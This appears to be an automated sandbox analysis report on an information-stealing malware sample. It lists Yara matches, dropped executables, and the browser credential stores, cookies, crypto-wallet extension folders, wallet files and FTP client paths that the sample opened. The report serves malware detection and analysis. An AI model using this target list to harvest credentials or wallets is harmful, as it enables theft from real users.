Source: Yara match File source: 0000001C.00000000.2877490551.0000000000AB1000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3039874893.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.3096831716.0000000000AB1000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RLX7QEJ1ATLQN8ECDIPHB.exe PID: 2680, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 353ab0ae6e.exe PID: 8036, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: Wallets/Electrum-LTC
Source: file.exe String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: window-state.json
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: 09d417a7c4.exe, 0000000B.00000003.2786782461.000000000147C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG Jump to behavior
